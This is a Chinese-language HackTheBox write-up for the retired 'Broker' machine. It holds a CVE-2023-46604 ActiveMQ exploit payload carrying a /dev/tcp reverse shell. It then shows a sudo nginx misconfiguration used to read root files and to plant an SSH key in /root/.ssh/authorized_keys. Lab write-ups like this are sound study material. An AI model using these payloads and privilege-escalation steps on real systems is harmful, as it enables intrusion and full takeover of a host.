| 信息 | |
|---|---|
| 系统 | Linux |
| 难度 | Easy |
| 状态 | 退役 |
| IP | 10.10.11.243 |
Nmap扫描
root@koi:~/Hackthebox/Boker# cat port.nmap
# Nmap 7.80 scan initiated Thu Jan 11 19:42:26 2024 as: nmap -p- -oA Boker/port 10.10.11.243
Nmap scan report for 10.10.11.243
Host is up (0.0034s latency).
Not shown: 65526 closed ports
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
1883/tcp open mqtt
5672/tcp open amqp
8161/tcp open patrol-snmp
41183/tcp open unknown
61613/tcp open unknown
61614/tcp open unknown
61616/tcp open unknown
# Nmap done at Thu Jan 11 19:42:35 2024 -- 1 IP address (1 host up) scanned in 9.47 seconds
root@koi:~/Hackthebox# nmap -sC -sV -p22,80,1883,5672,8161,41183,61613,61614,61616 10.10.11.243 -oA Boker/CV
Starting Nmap 7.80 ( https://nmap.org ) at 2024-01-11 19:46 CST
Nmap scan report for 10.10.11.243
Host is up (0.0039s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.4 (Ubuntu Linux; protocol 2.0)
80/tcp open http nginx 1.18.0 (Ubuntu)
| http-auth:
| HTTP/1.1 401 Unauthorized\x0D
|_ basic realm=ActiveMQRealm
|_http-server-header: nginx/1.18.0 (Ubuntu)
|_http-title: Error 401 Unauthorized
1883/tcp open mqtt
|_mqtt-subscribe: ERROR: Script execution failed (use -d to debug)
5672/tcp open amqp?
|_amqp-info: ERROR: AQMP:handshake expected header (1) frame, but was 65
| fingerprint-strings:
| DNSStatusRequestTCP, DNSVersionBindReqTCP, GetRequest, HTTPOptions, RPCCheck, RTSPRequest, SSLSessionReq, TerminalServerCookie:
| AMQP
| AMQP
| amqp:decode-error
|_ 7Connection from client using unsupported AMQP attempted
8161/tcp open http Jetty 9.4.39.v20210325
| http-auth:
| HTTP/1.1 401 Unauthorized\x0D
|_ basic realm=ActiveMQRealm
|_http-server-header: Jetty(9.4.39.v20210325)
|_http-title: Error 401 Unauthorized
41183/tcp open tcpwrapped
61613/tcp open unknown
| fingerprint-strings:
| HELP4STOMP:
| ERROR
| content-type:text/plain
| message:Unknown STOMP action: HELP
| org.apache.activemq.transport.stomp.ProtocolException: Unknown STOMP action: HELP
| org.apache.activemq.transport.stomp.ProtocolConverter.onStompCommand(ProtocolConverter.java:258)
| org.apache.activemq.transport.stomp.StompTransportFilter.onCommand(StompTransportFilter.java:85)
| org.apache.activemq.transport.TransportSupport.doConsume(TransportSupport.java:83)
| org.apache.activemq.transport.tcp.TcpTransport.doRun(TcpTransport.java:233)
| org.apache.activemq.transport.tcp.TcpTransport.run(TcpTransport.java:215)
|_ java.lang.Thread.run(Thread.java:750)
61614/tcp open http Jetty 9.4.39.v20210325
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Jetty(9.4.39.v20210325)
|_http-title: Site doesn't have a title.
61616/tcp open apachemq ActiveMQ OpenWire transport
| fingerprint-strings:
| NULL:
| ActiveMQ
| TcpNoDelayEnabled
| SizePrefixDisabled
| CacheSize
| ProviderName
| ActiveMQ
| StackTraceEnabled
| PlatformDetails
| Java
| CacheEnabled
| TightEncodingEnabled
| MaxFrameSize
| MaxInactivityDuration
| MaxInactivityDurationInitalDelay
| ProviderVersion
|_ 5.15.15
3 services unrecognized despite returning data. 主要的端口和服务有: 22:ssh,80:web,8161:web,61616:ActiveMQ
61616 ActiveMQ服务
版本号为5.15.15
通过搜索发现该版本存在漏洞(CVE-2023-46604远程代码执行漏洞)
X1r0z/ActiveMQ-RCE: ActiveMQ RCE (CVE-2023-46604) 漏洞利用工具 (github.com)
修改poc-linux.xml,(需要进行html entity encode)
<?xml version="1.0" encoding="UTF-8" ?>
<beans xmlns="http://www.springframework.org/schema/beans"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xsi:schemaLocation="
http://www.springframework.org/schema/beans http://www.springframework.org/schema/beans/spring-beans.xsd">
<bean id="pb" class="java.lang.ProcessBuilder" init-method="start">
<constructor-arg>
<list>
<value>bash</value>
<value>-c</value>
<!-- The command below downloads the file and saves it as test.elf -->
<value>bash -i >& /dev/tcp/10.10.16.21/1234 0>&1</value>
</list>
</constructor-arg>
</bean>
</beans>运行
# go run main.go -i 10.10.11.243 -p 61616 -u http://10.10.16.21:8081/poc-linux.xml
_ _ _ __ __ ___ ____ ____ _____
/ \ ___| |_(_)_ _____| \/ |/ _ \ | _ \ / ___| ____|
/ _ \ / __| __| \ \ / / _ \ |\/| | | | |_____| |_) | | | _|
/ ___ \ (__| |_| |\ V / __/ | | | |_| |_____| _ <| |___| |___
/_/ \_\___|\__|_| \_/ \___|_| |_|\__\_\ |_| \_\\____|_____|
[*] Target: 10.10.11.243:61616
[*] XML URL: http://10.10.16.21:8081/poc-linux.xml
[*] Sending packet: 000000781f000000000000000000010100426f72672e737072696e676672616d65776f726b2e636f6e746578742e737570706f72742e436c61737350617468586d6c4170706c69636174696f6e436f6e74657874010025687474703a2f2f31302e31302e31362e32313a383038312f706f632d6c696e75782e786d6c成功反弹shell,进行加固
python3 -c 'import pty;pty.spawn("/bin/bash")'
export TERM=xterm
Ctrl+Z
stty raw -echo; fg在家目录下获得user flag
提权
sudo起手
activemq@broker:/tmp$ sudo -l
Matching Defaults entries for activemq on broker:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin,
use_pty
User activemq may run the following commands on broker:
(ALL : ALL) NOPASSWD: /usr/sbin/nginx当前用户可以无密码使用sudo的nginx
新建nginx的配置文件,/tmp/nginx2.conf
user root;
worker_processes 4;
pid /tmp/nginx.pid;
events {
worker_connections 768;
}
http {
server {
listen 1337;
root /;
autoindex on;
dav_methods PUT;
}
}运行自定义的配置文件 sudo /usr/sbin/nginx -c /tmp/nginx2.confcurl http://10.10.11.243:1337/root/root.txt 即可获得flag
因为开启了PUT方法,我们还可以通过上传公钥到/root/.ssh/authorized_keys
# 上传
curl -X PUT localhost:1337/root/.ssh/authorized_keys -d "$(cat ./boker.pub)"
# 连接
ssh -i boker root@10.10.11.243成功获得root的shell
总结
这个靶场相较于之前做过的不太相同,他不是以 80 等web端口作为主要的渗透路径,而是使用了 61616端口的ActiveMQ服务的cve找到立足点.需要注意的是,xml中的Payload需要进行html entity encode,否则不会运行.
权限提升部分,使用了sudo 运行 nginx,利用nginx的错误配置,达到类似于未授权访问的任意文件读取/上传的效果(学到了新姿势).
